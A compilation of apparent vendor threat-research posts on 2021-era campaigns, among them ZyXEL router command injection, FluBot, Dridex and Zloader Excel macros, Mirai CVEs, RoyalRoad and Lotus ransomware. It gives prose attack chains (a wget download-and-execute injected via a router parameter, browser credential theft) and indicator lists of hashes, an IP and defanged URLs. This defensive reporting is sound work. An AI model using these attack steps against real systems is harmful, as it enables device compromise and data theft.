Posts

Attackers actively targeting vulnerable ZyXEL routers

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in ZyXEL products. TrueOnline is a major internet service provider in Thailand which distributes various rebranded ZyXEL routers to its customers.

Command Injection Vulnerability CVE-2017-18368

The ZyXEL P660HN-T router distributed by TrueOnline is prone to command injection vulnerability in the Remote System Log forwarding function. This function is accessible to an unauthenticated user. The vulnerability is in the ViewLog.asp page and can be exploited through the remote_host parameter.

The following exploit is spotted in the wild

This router has a command injection vulnerability in the Maintenance> Logs > System Log> Remote System Log forwarding function. The vulnerability is in the ViewLog.asp page, which is accessible unauthenticated. The attacker takes advantage of the vulnerability to bypass authentication by appending commands to remote_host parameter via the POST request.

The attacker downloads a malicious executable by injecting “wget”  command and saves it in the tmp directory . Then they set the permissions  of malicious file to 777, meaning this file will be readable, writable and executable by all users . The attacker then executes the malicious files and deletes it to leave no trace.

SonicWall Capture Labs provides protection against this threat via following signatures:

    • IPS 15168: ZyXEL Products Command Execution (CVE-2017-18368)
    • GAV: Tsunami.DN

This vulnerability is patched.

Threat Graph

IoCs:

107.174.133.119

b28a3fbf79afdbf3965b6890cb2a1a7c5a0bdb59e50e98f1e20389894c8d928b

 

Android FluBot infections continue but with a dip in numbers

Four suspects were arrested in March 2021 in Barcelona in connection with the Android Banker FluBot. Majority of the malware’s victims are located in Spain. However even after the arrest FluBot continues to spread, albeit in lower numbers.

The chart below shows a dip in FluBot samples in March compared to the previous 2 months:

 

Common application names used by this campaign that we identified are:

  • FedEx
  • DHL

Common package names used by this campaign that we identified are:

  • com.tencent.mm
  • com.tencent.mobileqq

Below is an analysis of a specific sample belonging to this campaign:

  • MD5: 1a2a4044cf18eed59e66c413db766145
  • Package Name: com.tencent.mm
  • Application Name: Fed Ex

 

The malware requests for the following permissions:

  • android.permission.CALL_PHONE
  • android.permission.FOREGROUND_SERVICE
  • android.permission.INTERNET
  • android.permission.NFC
  • android.permission.QUERY_ALL_PACKAGES
  • android.permission.READ_CONTACTS
  • android.permission.READ_PHONE_STATE
  • android.permission.READ_SMS
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.RECEIVE_SMS
  • android.permission.REQUEST_DELETE_PACKAGES
  • android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
  • android.permission.SEND_SMS
  • android.permission.WAKE_LOCK
  • android.permission.WRITE_SMS

Few sensitive actions that can be performed using these permissions:

  • Access contacts
  • Place phone calls
  • Access SMS
  • Send SMS
  • Ignore battery optimizations, preventing the application from hibernating
  • Auto start the malware after device reboot
  • Access Internet

Upon installation the malware requests for Accessibility services:

 

In Android, the first screen that appears to the user is referred to as the Main Activity. This activity can be identified as the one with intent filter action as MAIN and category as LAUNCHER. For the FluBot malware in question, the activity identified as main activity cannot be located in the classes within the code tree:

This indicates that the real code with main activity might be a different file that is likely decrypted and dropped locally upon malware execution.

As expected a dex file gets dropped during execution in the app_apkprotector_dex folder locally as classes-v1.dex and classes-v1.bin:

 

The classes-v1.bin file is a .dex file in reality and this file contains the malicious code that gets executed during runtime. The main activity class that could not be located earlier can be seen in this file:

 

FluBot contains capabilities to receive the following commands and execute associated actions:

  • BLOCK
  • SOCKS
  • UPLOAD_SMS
  • OPEN_URL
  • NOTIF_INT_TOGGLE
  • RUN_USSD
  • DISABLE_PLAY_PROTECT
  • RELOAD_INJECTS
  • SEND_SMS
  • GET_CONTACTS
  • RETRY_INJECT
  • UNINSTALL_APP
  • CARD_BLOCK
  • SMS_INT_TOGGLE

The command AMI_DEF_SMS_APP requests the user to set the FluBot app as the default SMS application on the device:

 

The command CARD_BLOCK shows a fake card details activity to the user which is used to steal Credit Card information:

 

FluBot makes it difficult to remove it from the device as it has access to accessibility services. If a victim tries the regular way of removing it by settings > apps > Fed Ex (or any other FluBot malware name) the malware force closes the settings app and displays the message “You can not perform this action on a service system”.

 

FluBot contains a Domain Generation Algorithm (DGA) using which it communicates with the C&C servers. As shown below, a single  apk contacts a number of different URLs:

 

SonicWall Capture Labs provide protection against this threat with the following signatures:

  • AndroidOS.FluBot.CL (Trojan)

 

Indicators of Compromise (IOC’s):

  • 1a2a4044cf18eed59e66c413db766145
  • 74f88d5480aefe165721c36100dcf89a
  • 3759f4ae5378372d34be6022c31c306c

Fake SpaceX Starbase Invite Excel document found distributing Dridex

The SonicWall Capture Labs Threat Research Team has observed that a fake Space Starbase Invite is being circulated over email with a malicious excel document as an attachment. On opening the attachment, it will execute VBA macro code to infect the system with Dridex malware.

Infection Cycle

Upon opening the attachment, the user is displayed instructions to enable content as shown below:


Fig-1: Excel File

The malicious excel file has obfuscated macro and a workbook_open method, which gets executed upon opening the document. The VBA Macro drops an XSL file into %appdata%\<random>.xsl.  The dropped XSL is then executed by passing it as an argument to WMIC (Windows Management Instrumentation Command-line utility).


Fig-2: VBA Macro creating XSL file

XSL file

XSL files are style sheets to process data in XLM files which also supports script embedding and execution. This old technique has been assigned Mitre ATT &CK ID: T1220.

The XSL file contains JScript code to download and execute the payload. The payload takes “validateLog” as an argument as shown below:


Fig-3: Contents of XSL file

 

SonicWall Capture ATP protects against this threat as shown below:


Fig-4: Capture ATP report

 

Indicators of Compromise

SHA256 of malicious excel files:

  • 21bf810cf015e8ffec9b844632a94274d9d387ad528e7d75adf116acea5a4d4b
  • 2355f05bca712ce31b1fef911395862eb34e73db7a3ca0a6bee2664024e47518
  • 376dad0f953db87ebfa71edb5173d4d8226c242d257a40cc9359f4d53b850aff
  • 466e4c5fe6b3c05ff34e487a0ba0910c1dc53b1c41ef1c27a779379bd2c9534d
  • 4d8ae33f7f5e41d9b3c3109daf043f5a803c639a68a697838bdcd17135c03730
  • 55a258190c8461b2aec9e698edb85297f2c850de44e6659529b00a0af7c98fe6
  • a5bc04a9b80ebb1b62367b8fec7463da3b0d096bc99c798f7ecf1f048580729c
  • af686418e437e9dca34e08381e3dc8e5f3aa06a458e610d9095ce2eb0a00ebc4
  • c83e3d04d0807dbb1144f776ab144e9b85c94b0c0e8ca05f78664e6e46f621cd
  • ee3755902532f4636d3a8a86de2f9bc13ae235a9220f97a8862d82bc52599066

Network Connections:

  • https://new[.]bombill[.]com/B2B/js/public_html/new[.]bombill[.]com/kML98YVm1[.]php
  • https://mishpachton[.]club/wp-content/uploads/2020/01/sULnmh1mel6Ha[.]php
  • https://hotelmarissa[.]ro/hms/highslide/graphics/outlines/aKBRsNGhkJnFy[.]php
  • https://lekkievents[.]com/RcjJztqmB3CJ[.]php
  • https://slasinfo[.]com/wp-content/plugins/better-wp-security/core/Z3w9lRfmiUeqn[.]php
  • https://turktech[.]co[.]uk/wp-content/uploads/2020/01/XBKtCe6h[.]php
  • https://marcosindiagroup[.]com/wp-content/uploads/elementor/css/Y1KA13a0oHq0vv[.]php
  • https://drakarys[.]rs/img/icons/tabs/xTPpiyC3[.]php
  • https://jettyplus[.]com/wp-includes/sodium_compat/namespaced/Core/n95mTqnEYm2lEqF[.]php
  • https://desertkingresort[.]com/wp-includes/js/mediaelement/renderers/Qh3RRz2g[.]php
  • https://elivebox[.]net/school/bower_components/chosen/docsupport/7Il9rC5wQ[.]php
  • https://eletronicaeduardo[.]com[.]br/www3/sistema/application/config/ANBPUKvb49gQn[.]php
  • https://mail[.]beetleorchid[.]in//i07uqfyKKQ3jUN8[.]php
  • https://nationalngofederation[.]com/wp-includes/SimplePie/Decode/HTML/CQiRG6YtYGt[.]php
  • https://leer-afrikaans[.]co[.]za/5TdZj0lfsvo[.]php
  • https://mail[.]account[.]inventorybiz[.]com//X70ySsjm2[.]php
  • https://elkytoursandtravel[.]com/wp-includes/SimplePie/Decode/HTML/i06d5d4XcypWc[.]php
  • https://drlamyas[.]net/wp-content/plugins/LayerSlider/classes/gt45kDacR6[.]php
  • https://one2onematch[.]net/back_up/under/fonts/Montserrat/kDCn9x8aeY8jz[.]php
  • https://centrodetraduccionespuce[.]com/intranet_old/css/vendor/square/risWzMrGzRtO4bS[.]php
  • https://askcon[.]net/wp-includes/SimplePie/Content/Type/0lOzUuHLScUH[.]php
  • https://crm[.]sgdatapos[.]com/modules/goals/language/bulgarian/vdOwNUr2yXh[.]php
  • https://lweonepal[.]com/wp-content/cache/object/013/bFPs28xfQyOe[.]php
  • https://triplonet[.]com[.]br/__MACOSX/wp-includes/js/codemirror/3Uqzx5RTyl8pT[.]php
  • https://casagrandecontabil[.]com[.]br/vo/vfm-admin/images/avatars/1Wu2EdUfRb3q7Zu[.]php
  • https://ppdb[.]smp1sbw[.]sch[.]id/ro-plugins/ckeditor/skins/moono-lisa/767884gnQIu[.]php
  • https://blog[.]garantitorna[.]com/wp-includes/css/dist/block-directory/j9nCiyCAcJQDh3[.]php
  • https://dikan[.]co[.]za/wsz2SCI6sU6k6o[.]php
  • https://elearn[.]empoweredmw[.]com/lib/minify/matthiasmullie-minify/data/WD3Uawo4EEZ[.]php
  • https://equiposautomotriz[.]com/wp-includes/Requests/Exception/HTTP/U997eIiQSqs3[.]php
  • https://familystory[.]es/wp-content/uploads/2021/01/InOm7e9u4vMmW[.]php
  • https://fortgem[.]co[.]uk/wp-includes/css/dist/block-directory/Pk57G2yz[.]php
  • https://sproca[.]tg/wp-content/themes/agronomics-lite/css/nj6N9LQhADNC[.]php
  • https://tarifacabins[.]com/wp-includes/js/mediaelement/renderers/KcsChOSuEV[.]php
  • https://gesky[.]co[.]tz/wp-includes/sodium_compat/namespaced/Core/HMJi1PQC[.]php
  • https://birkett[.]com[.]au/include/Base/Modules/Filter/KZyRSXJtoC[.]php
  • https://dentaldesignstudiowi[.]com/wp-content/uploads/2021/01/9eFsntMZ[.]php

SHA256 of Dridex payload:

  • a095a0ec3cd1655bbabad3f3b2e996521444c93dc51f1e78af878bfef3fd3ca8
  • c190c5a25b2616a4a0c4965d5f83cc47e47f2d2e4d2cab2c8987dcc29db290a3

Dropped Files:

  • %appdata%\<random>.xsl
  • C:\windows\Temp\<random>.dll

Critical Vulnerabilities Of Network Security Devices Being Utilized By Mirai Botnet Malware

The SonicWall Capture Labs Threat Research team has received reports about a new Mirai botnet malware targeting network security devices. The Mirai botnet malware attack involves many different brands of connected network security devices that are affected by critical vulnerabilities. The following vulnerabilities are involved:

  • CVE-2020-25506: D-Link DNS-320 firewall exploit
  • CVE-2021-27561: Yealink Device Management remote code-execution (RCE)
  • CVE-2021-27562: Yealink Device Management remote code-execution (RCE)
  • CVE-2020-26919: Netgear ProSAFE Plus exploit
  • CVE-2021-22502: Micro Focus Operation Bridge Reporter RCE
  • CVE-2019-19356: Netis WF2419 Wireless Router Remote Code Execution (RCE)
  • VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability

On March 16, 2021, SonicWall Capture Labs Threat Research team released the following signatures to protect against such attacks:

  • CVE-2020-25506
    IPS:15455 D-Link DNS-320 system_mgr.cgi Command Injection
  • CVE-2021-27561/CVE-2021-27562
    IPS:15456 Yealink DM Remote Code Execution
  • CVE-2021-22502
    IPS:15457 Micro Focus Operations Bridge Reporter Command Injection
  • CVE-2019-19356
    IPS:15458 Netis WF2419 netcore_set.cgi Remote Code Execution
  • VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability
    This is an old vulnerability. SonicWall released the patch for this vulnerability in 2015. There are also existing signatures detecting it:
    IPS:5603 GNU Bash Code Injection (CVE-2014-6271) 2
    IPS:13064 GNU Bash Code Injection (CVE-2014-6278)
  • GAV signatures to cover malware samples:
    GAV: Mirai.LL
    GAV: Mirai.LL_1

 

Fake Covid-19 vaccine-related information found spreading malware

As Covid-19 vaccinations happen across the country, cybercriminals are riding the wave again using social engineering tactics purporting to be vaccine-related information to spread malware and steal user information. The Sonicwall Capture Labs Research team has analyzed a malicious PDF befittingly named “Adenovirus vector.pdf” which pertains to one of the viral vectors used in some late-stage COVID-19 vaccine trials according to the CDC website.

Infection Cycle:

The files comes as a PDF possibly via spam as an email attachment using the following filename:

  • Adenovirus vector.pdf

Once executed, the victim is presented with a fake “I’m not a Robot” Captcha which when clicked will redirect to a malicious website.

One redirect leads to seemingly unending redirects to a slew of ad websites.

To then asking the victim to download a malicious software called “Security Helper” extension.

And scare the user to thinking that his system is infected by displaying fake scan results which purports to be from some well-known Antivirus vendors like McAfee and Norton with links on how to “fix” the problem and purchase protection which leads to another dubious website.

  

These fake security pop ups will not stop because malicious websites were added in the browser’s “allow” list which allows it to send these notifications.

It comes as no surprise that cybercriminals take advantage of current events such as the pandemic and the vaccine rollout to spread malware. Therefore we urge our users to only get vaccine-related information and services from trusted websites or sources and to exercise caution when downloading software from unfamiliar websites.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Malagent.N_107 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Microsoft Security Bulletin Coverage for March 2021

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of March 2021. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2021-24095 DirectX Elevation of Privilege Vulnerability
ASPY 5907: Malformed-File exe.MP.131

CVE-2021-26411 Internet Explorer Memory Corruption Vulnerability
IPS 15430: Internet Explorer Memory Corruption Vulnerability (CVE-2021-26411)

CVE-2021-26855 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 15420: Microsoft Exchange Server Remote Code Execution ( CVE-2021-26855) 2

CVE-2021-26857 Microsoft Exchange Server Remote Code Execution Vulnerability
ASPY 158: Malformed-File xml.MP.4

CVE-2021-26863 Windows Win32k Elevation of Privilege Vulnerability
ASPY 160: Malformed-File exe.MP.171

CVE-2021-26868 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 161: Malformed-File exe.MP.172

CVE-2021-26877 Windows DNS Server Remote Code Execution Vulnerability
IPS 15434: Windows DNS Server Remote Code Execution (CVE-2021-26877)

CVE-2021-26897 Windows DNS Server Remote Code Execution Vulnerability
IPS 15435: Windows DNS Server Remote Code Execution (CVE-2021-26897)

CVE-2021-27076 Microsoft SharePoint Server Remote Code Execution Vulnerability
ASPY 162: Malformed-File exe.MP.173

CVE-2021-27077 Windows Win32k Elevation of Privilege Vulnerability
ASPY 163: Malformed-File ex.MP.174

CVE-2021-27065 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 15421: Microsoft Exchange Server Remote Code Execution 1

CVE-2021-27078 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 15421: Microsoft Exchange Server Remote Code Execution 1

Following vulnerabilities do not have exploits in the wild :
CVE-2021-1640 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-1729 Windows Update Stack Setup Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-21300 Git for Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-24089 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-24090 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-24104 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-24107 Windows Event Tracing Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-24108 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-24110 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26412 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26854 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26858 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26859 Microsoft Power BI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-26860 Windows App-V Overlay Filter Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26861 Windows Graphics Component Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26862 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26864 Windows Virtual Registry Provider Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26865 Windows Container Execution Agent Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26866 Windows Update Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26867 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26869 Windows ActiveX Installer Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-26870 Windows Projected File System Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26871 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26872 Windows Event Tracing Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26873 Windows User Profile Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26874 Windows Overlay Filter Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26875 Windows Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26876 OpenType Font Parsing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26878 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26879 Windows NAT Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-26880 Storage Spaces Controller Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26881 Microsoft Windows Media Foundation Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26882 Remote Access API Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26884 Windows Media Photo Codec Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-26885 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26886 User Profile Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-26887 Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26889 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26890 Application Virtualization Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26891 Windows Container Execution Agent Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26892 Windows Extensible Firmware Interface Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-26893 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26894 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26895 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26896 Windows DNS Server Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-26898 Windows Event Tracing Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26899 Windows UPnP Device Host Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26900 Windows Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26901 Windows Event Tracing Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26902 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27047 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27048 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27049 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27050 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27051 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27052 Microsoft SharePoint Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-27053 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27054 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27055 Microsoft Visio Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-27056 Microsoft PowerPoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27057 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27058 Microsoft Office ClickToRun Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27059 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27060 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27061 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27062 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27063 Windows DNS Server Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-27066 Windows Admin Center Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-27070 Windows 10 Update Assistant Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27074 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27075 Azure Virtual Machine Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-27080 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27081 Visual Studio Code ESLint Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27082 Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27083 Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27084 Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27085 Internet Explorer Remote Code Execution Vulnerability
There are no known exploits in the wild.

8t_Dropper, RoyalRoad

Overview:

SonicWall Capture Labs Threat Research Team recently found a new sample for 8t_Dropper aka RoyalRoad. Royal Road is a tool shared by many targeted attack groups believed to belong to China. The sample below locates and downloads passwords using SQL queries into your current browsers stored database. (Google Chrome, Firefox, Thunderbird)

Threat Actor(s) Involved: Hellsing, Ice Fog, Pirate Panda, RANCOR, TA428, Tick, Tonto Team, Karma Panda

MITRE ATT&CK Information:

ID: T1055
Sub-techniques: T1055.001, T1055.002, T1055.003, T1055.004, T1055.005, T1055.008, T1055.009, T1055.011, T1055.012, T1055.013, T1055.014
Tactics: Defense Evasion, Privilege Escalation
Platforms: Linux, Windows, macOS
Data Sources: API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Defense Bypassed: Anti-virus, Application control
CAPEC ID: CAPEC-640

Sample, Static Information:

Checking for a valid PE File, red highlights will form within each PE member, if invalid data is found within the PE File. This sample passes, this check.

Entropy of sample:

First Stage, Dropper, Dynamic Information:

A List/Table of the shell coders function calls in IDA Pro, disassembled:

This trick is used a lot in malware, (Call+5), disassembled:

Shellcode Function Calls Disassembled in x32 Debug:

Encrypted Buffer:

Decrypted Buffer:

Dropped DLL:

Encryption used in DLL:

NSS Info:

NSS Overview:

NSS Decompiled

SQL Functions Decompiled:

(SQL Query) – Thunderbird Password Captures:

(SQL Query) – Google Chrome Password Captures:

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall, (GAV) Gateway Anti-Virus, provides protection against this threat:

  • GAV: 8t_Dropper.A (Trojan)

Appendix:

Sample SHA256 Hash: 859443a72a9a9f53e3810efbddc79c68a243fcba0c52957c0a37846384477133

CRITICAL REMOTE CODE EXECUTION FLAWS IN MICROSOFT EXCHANGE ARE BEING ACTIVELY EXPLOITED

The SonicWall Capture Labs Threat Research team has received reports that threat actors are actively exploiting the following Microsoft Exchange vulnerabilities:

  • CVE-2021-26855
  • CVE-2021-26857
  • CVE-2021-26858
  • CVE-2021-27065

These vulnerabilities allow the attackers access to emails found in the Exchange Servers, which could include sensitive or personal data.

Affected Products:

Microsoft Exchange Server 2013, 2016 and 2019 are affected by these vulnerabilities. Users should apply the updates as soon as possible.  Microsoft has also released a “Defense in Depth” update for Exchange Server 2010.

On March 2, 2021, SonicWall Capture Labs Threat Research team released the following signatures to protect against such attacks:

IPS: 15418 WEB-ATTACKS Microsoft Exchange Server Remote Code Execution (CVE-2021-26857)
IPS: 15419 WEB-ATTACKS Microsoft Exchange Server Remote Code Execution ( CVE-2021-26855) 1
IPS: 15420 WEB-ATTACKS Microsoft Exchange Server Remote Code Execution ( CVE-2021-26855) 2
IPS: 15421 WEB-ATTACKS Microsoft Exchange Server Remote Code Execution 1

It is also recommended that DPI-SSL be enabled.  The following articles describe how to configure DPI-SSL:
https://www.sonicwall.com/support/knowledge-base/how-can-i-configure-client-dpi-ssl/170505885674291/
https://www.sonicwall.com/support/knowledge-base/how-to-configure-server-dpi-ssl/170505900099021/

Lotus ransomware charges 1 BTC ($49K USD). Multi PC discount possible

The SonicWall Capture Labs threat research team has observed reports of a variant from the Crysis/Dharma ransomware family called Lotus.  The operators of this malware charge 1 BTC ($49K USD at the time of writing this alert) for file recovery.  However, the price appears to be negotiable after a conversation with the malware operator.

 

Infection Cycle:

 

Upon infection, the malware can be seen using the built-in mshta program to display the ransom message:

 

Files on the system are encrypted and the following extension is appended to their file names:

.id-E625BDD2.[paymei@cock.li].LOTUS

 

The following ransom message is displayed on the desktop:

 

The following files are dropped on to the system:

  • MANUAL.txt (in every directory containing encrypted files)
  • %APPDATA%\Roaming\{original malware file name} [Detected as: GAV: Lotus.RSM (Trojan)]
  • %APPDATA%\Roaming\Info.hta (contains message shown above)
  • %APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta (contains message shown above)

 

MANUAL.txt contains the following text:

 

We reached out to the supplied emails and had the following conversation with the ransomware operator:

 

The operator asks how many pc’s we would like to recover.  This leads us to believe that the malware is aimed at large organizations:

 

We see if we can negotiate further if we have multiple infected PC’s:

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Lotus.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Excel with misleading macrosheet name spreading Zloader

SonicWall Capture Labs Threats Research team has been observing modifications in the techniques being used to distribute ZLoader using MS-Excel file. It all began around Jan 2020, when the first campaign was seen using XLM macro instead of the commonly used VBA macro. Since then, we have observed significant improvements like addition of evasion and sandbox bypassing techniques through XLM macro as already described in our previous blog.

This variant uses OOXML format based MS-Excel file. In the OOXML format based MS-Excel file, usually the XLM macro sheets are stored inside “macrosheets”  folder. The sheets are named either “Sheet<digit>.xml” or “intlsheet<digit>.xml”.  This variant uses a completely different folder and file name to store macro sheet. The macro sheet and folder are named “foto.png” and “bioxr” respectively, as shown in the below image:


Fig-1: XLM MacroSheet

Engines looking for macro sheets specifically inside “macrosheets” folder might fail to identify these files as XLM based Macro files. After careful inspection of the “workbook.xml.rels” file, we found that both the folder and the file name for the macro sheet are misleading as shown below:


Fig-2: workbook.xml.rels

Sample Analysis:

Upon opening the file, the user is displayed instructions to enable macro as shown below:


Fig-3: Excel File

The sample contains two sheets, one is a hidden macro sheet. It has a defined name “Aut0_Open”, which enables macro execution as soon as the file is opened. Font size in the sheet is kept small ( “2”) to inhibit reading of the content.


Fig-4: hidden macro sheet

Upon execution of XLM macro, payload belonging to Zloader family is downloaded and saved as C:\<random>\<random>\ServApi.exe

SonicWall Capture ATP protects against this threat as shown below:


Fig-5: Capture Report

 

Indicators of Compromise:

SHA256 of malicious Excel Files:

  • 12047db782ec585e6c577248607f504869d166077ee33a4d455a66370ea6f9b4
  • 189735e1fde7511cd9cedfb317f544971411691192c25ca36147998e492753d7
  • 18d1cc06d96c741e0c21c1ceea194f37ca5941264cc0a26d89cba8e09c132485
  • 18e6f2976642ca37a4e81358ea8da608b5d34a50b1954d0c3041e902ae23e192
  • 18f33627843309fdef93e7edc7c24c856912d19a9622c2647165247e1aa16386
  • 1a03a110254fe594cb08e5db44b5dd7d00ebedf5bf6944e2aff7807195b7bff6
  • 1b29453e458e36c8b8b17371d4cb254a7cea4f1b035dc2d308e75ca1829766f3
  • 20af190130ad3ac40a01df57341929d968616ef717bc9e691308ccaf4f41a683
  • 211eb2bbaf1e1dcadd3f10c6c77ff2243f8690b1cd9f9dd5218d48d1b4edd02e
  • 224b3303d4f32bc71fa3322d9385d004293459ed74885179178d04c880dbf6f8
  • 2335e54b766bf5dc2a9078b995a4878ff350aa39d83ef7eabe77433c5c26e998

Network Connection:

  • safedot[.]digital
    • Domain registred on 25-Feb-2021

Files:

  • C:\<random>\<random>\ServApi.exe